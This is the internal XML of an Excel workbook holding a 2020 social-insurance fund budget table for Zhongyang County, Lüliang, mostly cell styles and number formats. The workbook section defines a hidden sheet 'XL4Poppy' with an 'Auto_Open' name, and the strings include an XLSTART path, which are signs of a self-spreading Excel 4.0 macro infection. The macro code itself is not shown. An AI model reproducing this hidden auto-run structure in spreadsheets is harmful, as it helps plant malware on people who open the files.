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算总表" sheetId="1" r:id="rId1"/>
    <sheet name="XL4Poppy" sheetId="2" state="hidden" r:id="rId2"/>
  </sheets>
  <definedNames>
    <definedName name="Auto_Open">XL4Poppy!$C$4</definedName>
    <definedName name="Bust" localSheetId="1">XL4Poppy!$C$31</definedName>
    <definedName name="Continue" localSheetId="1">XL4Poppy!$C$9</definedName>
    <definedName name="Document_array" localSheetId="1">{"Book1","2.xlsx"}</definedName>
    <definedName name="Documents_array" localSheetId="1">XL4Poppy!$B$1:$B$16</definedName>
    <definedName name="Hello">XL4Poppy!$A$15</definedName>
    <definedName name="Print_Area_MI">#REF!</definedName>
    <definedName name="전">#REF!</definedName>
    <definedName name="주택사업본부">#REF!</definedName>
    <definedName name="철구사업본부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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="44" uniqueCount="44">
  <si>
    <t>2020年社会保险基金预算总表</t>
  </si>
  <si>
    <t>社预01表</t>
  </si>
  <si>
    <t>吕梁市中阳县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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>
    <t>2.xlsx</t>
  </si>
  <si>
    <t>Book1</t>
  </si>
  <si>
    <t>D:\OFFICE11\xlstart\Book1.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</si>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</sst>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5">
    <numFmt numFmtId="176" formatCode="_-&quot;$&quot;\ * #,##0_-;_-&quot;$&quot;\ * #,##0\-;_-&quot;$&quot;\ * &quot;-&quot;_-;_-@_-"/>
    <numFmt numFmtId="177" formatCode="#,##0;\(#,##0\)"/>
    <numFmt numFmtId="178" formatCode="&quot;$&quot;#,##0_);[Red]\(&quot;$&quot;#,##0\)"/>
    <numFmt numFmtId="179" formatCode="#,##0.0_);\(#,##0.0\)"/>
    <numFmt numFmtId="180" formatCode="&quot;$&quot;\ #,##0_-;[Red]&quot;$&quot;\ #,##0\-"/>
    <numFmt numFmtId="181" formatCode="\$#,##0;\(\$#,##0\)"/>
    <numFmt numFmtId="182" formatCode="_-* #,##0_-;\-* #,##0_-;_-* &quot;-&quot;_-;_-@_-"/>
    <numFmt numFmtId="183" formatCode="yy\.mm\.dd"/>
    <numFmt numFmtId="184" formatCode="#,##0.00_ ;\-#,##0.00;;"/>
    <numFmt numFmtId="185" formatCode="&quot;$&quot;\ #,##0.00_-;[Red]&quot;$&quot;\ #,##0.00\-"/>
    <numFmt numFmtId="186" formatCode="mm/dd/yy_)"/>
    <numFmt numFmtId="42" formatCode="_ &quot;￥&quot;* #,##0_ ;_ &quot;￥&quot;* \-#,##0_ ;_ &quot;￥&quot;* &quot;-&quot;_ ;_ @_ "/>
    <numFmt numFmtId="43" formatCode="_ * #,##0.00_ ;_ * \-#,##0.00_ ;_ * &quot;-&quot;??_ ;_ @_ "/>
    <numFmt numFmtId="187" formatCode="_(&quot;$&quot;* #,##0_);_(&quot;$&quot;* \(#,##0\);_(&quot;$&quot;* &quot;-&quot;??_);_(@_)"/>
    <numFmt numFmtId="188" formatCode="_(&quot;$&quot;* #,##0_);_(&quot;$&quot;* \(#,##0\);_(&quot;$&quot;* &quot;-&quot;_);_(@_)"/>
    <numFmt numFmtId="44" formatCode="_ &quot;￥&quot;* #,##0.00_ ;_ &quot;￥&quot;* \-#,##0.00_ ;_ &quot;￥&quot;* &quot;-&quot;??_ ;_ @_ "/>
    <numFmt numFmtId="189" formatCode="&quot;$&quot;#,##0.00_);[Red]\(&quot;$&quot;#,##0.00\)"/>
    <numFmt numFmtId="190" formatCode="_-&quot;$&quot;\ * #,##0.00_-;_-&quot;$&quot;\ * #,##0.00\-;_-&quot;$&quot;\ * &quot;-&quot;??_-;_-@_-"/>
    <numFmt numFmtId="191" formatCode="_(&quot;$&quot;* #,##0.00_);_(&quot;$&quot;* \(#,##0.00\);_(&quot;$&quot;* &quot;-&quot;??_);_(@_)"/>
    <numFmt numFmtId="41" formatCode="_ * #,##0_ ;_ * \-#,##0_ ;_ * &quot;-&quot;_ ;_ @_ "/>
    <numFmt numFmtId="192" formatCode="_(&quot;$&quot;* #,##0.0_);_(&quot;$&quot;* \(#,##0.0\);_(&quot;$&quot;* &quot;-&quot;??_);_(@_)"/>
    <numFmt numFmtId="193" formatCode="mmm\ dd\,\ yy"/>
    <numFmt numFmtId="194" formatCode="\$#,##0.00;\(\$#,##0.00\)"/>
    <numFmt numFmtId="195" formatCode="_-* #,##0.00_-;\-* #,##0.00_-;_-* &quot;-&quot;??_-;_-@_-"/>
    <numFmt numFmtId="196" formatCode="#\ ??/??"/>
  </numFmts>
  <fonts count="6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2"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="27"/>
      <color indexed="8"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>
      <color indexed="8"/>
      <name val="Arial Narrow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Tahoma"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="43"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="8"/>
      <name val="Times New Roman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10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63"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="ＭＳ Ｐゴシック"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="17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0"/>
      <name val="楷体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <name val="MS Sans Serif"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Geneva"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <color indexed="8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0"/>
      <name val="Tms Rmn"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="蹈框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134"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="바탕체"/>
      <charset val="134"/>
    </font>
  </fonts>
  <fills count="7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rgb="FFFFFFC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1" borderId="17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horizontal="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="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3" fontId="1" fillId="0" borderId="19" applyFill="0" applyProtection="0">
      <alignment horizontal="right"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="12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25" borderId="20" applyNumberFormat="0" applyFont="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="29" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="16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/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9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0" borderId="0"/>
    <xf numFmtId="0" fontId="35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0"/>
    <xf numFmtId="0" fontId="28" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="10" fillId="1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9" fillId="7" borderId="15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horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="4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29" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="16" fillId="53" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="0" borderId="0"/>
    <xf numFmtId="192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27" fillId="29" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="19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43" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="19" fillId="12" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="5" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="43" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="30" fillId="5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/>
    <xf numFmtId="0" fontId="30" fillId="3" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="186" fontId="5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29" fillId="0" borderId="0">
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="10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4" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="10" fillId="12" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="8" fillId="55" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="185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191" fontId="5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27" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="8" fillId="57" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="41" fontId="45" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="8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0" fillId="59" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="8" fillId="55" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="8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60" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="182" fontId="5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45" fillId="0" borderId="0"/>
    <xf numFmtId="195" fontId="5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29" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="46" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="18" fillId="16" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="190" fontId="5" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="194" fontId="45" fillId="0" borderId="0"/>
    <xf numFmtId="15" fontId="47" fillId="0" borderId="0"/>
    <xf numFmtId="181" fontId="45" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="48" fillId="9" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="49" fillId="0" borderId="24" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="49" fillId="0" borderId="25">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="16" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="48" fillId="55" borderId="11" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="179" fontId="51" fillId="61" borderId="0"/>
    <xf numFmtId="179" fontId="52" fillId="62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0" fontId="45" fillId="0" borderId="0"/>
    <xf numFmtId="37" fontId="5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180" fontId="1" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="29" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="55" fillId="0" borderId="0"/>
    <xf numFmtId="3" fontId="5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96" fontId="5" fillId="0" borderId="0" applyFont="0" applyFill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42" fillId="0" borderId="27">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="65" borderId="0" applyNumberFormat="0" applyFont="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="42" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="54" fillId="63" borderId="26">
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="54" fillId="63" borderId="26">
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="54" fillId="63" borderId="26">
      <protection locked="0"/>
    </xf>
    <xf numFmtId="188" fontId="5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" fillId="0" borderId="28" applyNumberFormat="0" applyFill="0" applyProtection="0">
      <alignment horizontal="right"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="2" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="57" fillId="0" borderId="28" applyNumberFormat="0" applyFill="0" applyProtection="0">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="56" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="58" fillId="66" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="41" fillId="0" borderId="19" applyNumberFormat="0" applyFill="0" applyProtection="0">
      <alignment horizont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/>
    <xf numFmtId="0" fontId="53" fillId="64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9" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="60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/>
    <xf numFmtId="0" fontId="22" fillId="19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1" fillId="0" borderId="19" applyNumberFormat="0" applyFill="0" applyProtection="0">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="56" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="28" applyNumberFormat="0" applyFill="0" applyProtection="0">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="38" fontId="31" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="41" fontId="5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61" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0"/>
    <xf numFmtId="187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1" fontId="1" fillId="0" borderId="19" applyFill="0" applyProtection="0">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="47" fillId="0" borderId="0"/>
    <xf numFmtId="43" fontId="5" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="19" fillId="69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245"/>
    <xf numFmtId="0" fontId="2" fillId="2" borderId="0" xfId="245" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="0" xfId="245" applyFill="1"/>
    <xf numFmtId="0" fontId="1" fillId="3" borderId="1" xfId="245" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="3" fillId="4" borderId="2" xfId="245" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="5" borderId="3" xfId="245" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="4" borderId="3" xfId="245" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="4" borderId="4" xfId="245" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="3" borderId="5" xfId="245" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="1" fillId="3" borderId="6" xfId="245" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="169" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="169" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="169" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="169" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="7" xfId="169" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="7" xfId="169" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="8" xfId="169" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="8" xfId="169" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="9" xfId="169" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="10" xfId="169" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="11" xfId="169" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="12" xfId="169" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="9" xfId="169" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="13" xfId="169" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="184" fontId="8" fillId="0" borderId="9" xfId="169" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="184" fontId="8" fillId="0" borderId="14" xfId="169" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="184" fontId="8" fillId="0" borderId="9" xfId="169" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="9" xfId="169" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="9" xfId="169" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="0" xfId="169" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="0" xfId="169" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="7" xfId="169" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="184" fontId="8" fillId="0" borderId="10" xfId="169" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="0" xfId="169" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
  </cellXfs>
  <cellStyles count="258">
    <cellStyle name="常规" xfId="0" builtinId="0"/>
    <cellStyle name="货币[0]" xfId="1" builtinId="7"/>
    <cellStyle name="20% - 强调文字颜色 3" xfId="2" builtinId="38"/>
    <cellStyle name="输入" xfId="3" builtinId="20"/>
    <cellStyle name="差_Book1_Book1" xfId="4"/>
    <cellStyle name="60% - 着色 2" xfId="5"/>
    <cellStyle name="货币" xfId="6" builtinId="4"/>
    <cellStyle name="args.style" xfId="7"/>
    <cellStyle name="Accent2 - 40%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日期" xfId="14"/>
    <cellStyle name="Accent2 - 60%" xfId="15"/>
    <cellStyle name="超链接" xfId="16" builtinId="8"/>
    <cellStyle name="百分比" xfId="17" builtinId="5"/>
    <cellStyle name="已访问的超链接" xfId="18" builtinId="9"/>
    <cellStyle name="好_收入2010" xfId="19"/>
    <cellStyle name="常规 6" xfId="20"/>
    <cellStyle name="注释" xfId="21" builtinId="10"/>
    <cellStyle name="_ET_STYLE_NoName_00__Sheet3" xfId="22"/>
    <cellStyle name="_ET_STYLE_NoName_00__Book1" xfId="23"/>
    <cellStyle name="60% - 强调文字颜色 2" xfId="24" builtinId="36"/>
    <cellStyle name="好_工资明细表 (汇总)打印" xfId="25"/>
    <cellStyle name="标题 4" xfId="26" builtinId="19"/>
    <cellStyle name="好_Book1_2_Book1_Book1" xfId="27"/>
    <cellStyle name="警告文本" xfId="28" builtinId="11"/>
    <cellStyle name="_ET_STYLE_NoName_00_" xfId="29"/>
    <cellStyle name="标题" xfId="30" builtinId="15"/>
    <cellStyle name="_ET_STYLE_NoName_00__劳务工绩效津贴等汇总11年10月" xfId="31"/>
    <cellStyle name="着色 1" xfId="32"/>
    <cellStyle name="20% - 着色 5" xfId="33"/>
    <cellStyle name="_Book1_1" xfId="34"/>
    <cellStyle name="解释性文本" xfId="35" builtinId="53"/>
    <cellStyle name="标题 1" xfId="36" builtinId="16"/>
    <cellStyle name="标题 2" xfId="37" builtinId="17"/>
    <cellStyle name="0,0_x000d__x000a_NA_x000d__x000a_" xfId="38"/>
    <cellStyle name="_20100326高清市院遂宁检察院1080P配置清单26日改" xfId="39"/>
    <cellStyle name="Accent1_Book1" xfId="40"/>
    <cellStyle name="60% - 强调文字颜色 1" xfId="41" builtinId="32"/>
    <cellStyle name="标题 3" xfId="42" builtinId="18"/>
    <cellStyle name="60% - 强调文字颜色 4" xfId="43" builtinId="44"/>
    <cellStyle name="输出" xfId="44" builtinId="21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好" xfId="51" builtinId="26"/>
    <cellStyle name="着色 5" xfId="52"/>
    <cellStyle name="适中" xfId="53" builtinId="28"/>
    <cellStyle name="20% - 强调文字颜色 5" xfId="54" builtinId="46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强调文字颜色 3" xfId="60" builtinId="37"/>
    <cellStyle name="PSChar" xfId="61"/>
    <cellStyle name="强调文字颜色 4" xfId="62" builtinId="41"/>
    <cellStyle name="20% - 强调文字颜色 4" xfId="63" builtinId="42"/>
    <cellStyle name="20% - 着色 1" xfId="64"/>
    <cellStyle name="40% - 强调文字颜色 4" xfId="65" builtinId="43"/>
    <cellStyle name="强调文字颜色 5" xfId="66" builtinId="45"/>
    <cellStyle name="差_Book1_Book1_1" xfId="67"/>
    <cellStyle name="20% - 着色 2" xfId="68"/>
    <cellStyle name="40% - 强调文字颜色 5" xfId="69" builtinId="47"/>
    <cellStyle name="好_劳务工工工资表模板(2)" xfId="70"/>
    <cellStyle name="好_Book1_Book1_Book1" xfId="71"/>
    <cellStyle name="60% - 强调文字颜色 5" xfId="72" builtinId="48"/>
    <cellStyle name="强调文字颜色 6" xfId="73" builtinId="49"/>
    <cellStyle name="20% - 着色 3" xfId="74"/>
    <cellStyle name="40% - 强调文字颜色 6" xfId="75" builtinId="51"/>
    <cellStyle name="_弱电系统设备配置报价清单" xfId="76"/>
    <cellStyle name="60% - 强调文字颜色 6" xfId="77" builtinId="52"/>
    <cellStyle name=" 1" xfId="78"/>
    <cellStyle name="烹拳 [0]_97MBO" xfId="79"/>
    <cellStyle name="ColLevel_0" xfId="80"/>
    <cellStyle name="?鹎%U龡&amp;H?_x0008__x001c__x001c_?_x0007__x0001__x0001_" xfId="81"/>
    <cellStyle name="@ET_Style?CF_Style_1" xfId="82"/>
    <cellStyle name="_Book1" xfId="83"/>
    <cellStyle name="着色 2" xfId="84"/>
    <cellStyle name="Accent2 - 20%" xfId="85"/>
    <cellStyle name="20% - 着色 6" xfId="86"/>
    <cellStyle name="_Book1_2" xfId="87"/>
    <cellStyle name="着色 3" xfId="88"/>
    <cellStyle name="_Book1_3" xfId="89"/>
    <cellStyle name="_ET_STYLE_NoName_00__Book1_1" xfId="90"/>
    <cellStyle name="_幼教职教待遇申报统计表1" xfId="91"/>
    <cellStyle name="20% - 着色 4" xfId="92"/>
    <cellStyle name="40% - 着色 1" xfId="93"/>
    <cellStyle name="40% - 着色 2" xfId="94"/>
    <cellStyle name="40% - 着色 3" xfId="95"/>
    <cellStyle name="Standard_AREAS" xfId="96"/>
    <cellStyle name="40% - 着色 4" xfId="97"/>
    <cellStyle name="烹拳_97MBO" xfId="98"/>
    <cellStyle name="40% - 着色 5" xfId="99"/>
    <cellStyle name="40% - 着色 6" xfId="100"/>
    <cellStyle name="60% - 着色 1" xfId="101"/>
    <cellStyle name="60% - 着色 3" xfId="102"/>
    <cellStyle name="60% - 着色 4" xfId="103"/>
    <cellStyle name="60% - 着色 5" xfId="104"/>
    <cellStyle name="60% - 着色 6" xfId="105"/>
    <cellStyle name="6mal" xfId="106"/>
    <cellStyle name="Accent1" xfId="107"/>
    <cellStyle name="Accent1 - 20%" xfId="108"/>
    <cellStyle name="Accent1 - 40%" xfId="109"/>
    <cellStyle name="Accent1 - 60%" xfId="110"/>
    <cellStyle name="Accent2" xfId="111"/>
    <cellStyle name="Accent2_Book1" xfId="112"/>
    <cellStyle name="Accent3" xfId="113"/>
    <cellStyle name="Milliers_!!!GO" xfId="114"/>
    <cellStyle name="Accent3 - 20%" xfId="115"/>
    <cellStyle name="Mon閠aire [0]_!!!GO" xfId="116"/>
    <cellStyle name="Accent3 - 40%" xfId="117"/>
    <cellStyle name="Accent3 - 60%" xfId="118"/>
    <cellStyle name="Accent3_Book1" xfId="119"/>
    <cellStyle name="Accent4" xfId="120"/>
    <cellStyle name="Accent4 - 20%" xfId="121"/>
    <cellStyle name="Accent4 - 40%" xfId="122"/>
    <cellStyle name="捠壿 [0.00]_Region Orders (2)" xfId="123"/>
    <cellStyle name="Accent4 - 60%" xfId="124"/>
    <cellStyle name="Accent4_Book1" xfId="125"/>
    <cellStyle name="Accent5" xfId="126"/>
    <cellStyle name="Accent5 - 20%" xfId="127"/>
    <cellStyle name="千分位[0]_ 白土" xfId="128"/>
    <cellStyle name="Accent5 - 40%" xfId="129"/>
    <cellStyle name="Accent5 - 60%" xfId="130"/>
    <cellStyle name="Accent5_Book1" xfId="131"/>
    <cellStyle name="好_10吕梁2012年5月工资表（劳务工）" xfId="132"/>
    <cellStyle name="好_10打印吕梁12月劳务工工工资表" xfId="133"/>
    <cellStyle name="Accent6" xfId="134"/>
    <cellStyle name="Accent6 - 20%" xfId="135"/>
    <cellStyle name="Accent6 - 40%" xfId="136"/>
    <cellStyle name="Accent6 - 60%" xfId="137"/>
    <cellStyle name="Accent6_Book1" xfId="138"/>
    <cellStyle name="Comma [0]_!!!GO" xfId="139"/>
    <cellStyle name="통화_BOILER-CO1" xfId="140"/>
    <cellStyle name="comma zerodec" xfId="141"/>
    <cellStyle name="Comma_!!!GO" xfId="142"/>
    <cellStyle name="好_Book1_Book1" xfId="143"/>
    <cellStyle name="Currency [0]_!!!GO" xfId="144"/>
    <cellStyle name="样式 1" xfId="145"/>
    <cellStyle name="分级显示列_1_Book1" xfId="146"/>
    <cellStyle name="差_Book1_Book1_Book1" xfId="147"/>
    <cellStyle name="Currency_!!!GO" xfId="148"/>
    <cellStyle name="Currency1" xfId="149"/>
    <cellStyle name="Date" xfId="150"/>
    <cellStyle name="Dollar (zero dec)" xfId="151"/>
    <cellStyle name="Grey" xfId="152"/>
    <cellStyle name="Header1" xfId="153"/>
    <cellStyle name="Header2" xfId="154"/>
    <cellStyle name="差_Book1_4" xfId="155"/>
    <cellStyle name="Input [yellow]" xfId="156"/>
    <cellStyle name="Input Cells" xfId="157"/>
    <cellStyle name="Linked Cells" xfId="158"/>
    <cellStyle name="Millares [0]_96 Risk" xfId="159"/>
    <cellStyle name="Millares_96 Risk" xfId="160"/>
    <cellStyle name="Milliers [0]_!!!GO" xfId="161"/>
    <cellStyle name="Moneda [0]_96 Risk" xfId="162"/>
    <cellStyle name="Moneda_96 Risk" xfId="163"/>
    <cellStyle name="常规 3" xfId="164"/>
    <cellStyle name="Mon閠aire_!!!GO" xfId="165"/>
    <cellStyle name="New Times Roman" xfId="166"/>
    <cellStyle name="no dec" xfId="167"/>
    <cellStyle name="差_Book1_5" xfId="168"/>
    <cellStyle name="Normal" xfId="169"/>
    <cellStyle name="Normal - Style1" xfId="170"/>
    <cellStyle name="Normal_!!!GO" xfId="171"/>
    <cellStyle name="钎霖_laroux" xfId="172"/>
    <cellStyle name="PSInt" xfId="173"/>
    <cellStyle name="per.style" xfId="174"/>
    <cellStyle name="Percent [2]" xfId="175"/>
    <cellStyle name="Percent_!!!GO" xfId="176"/>
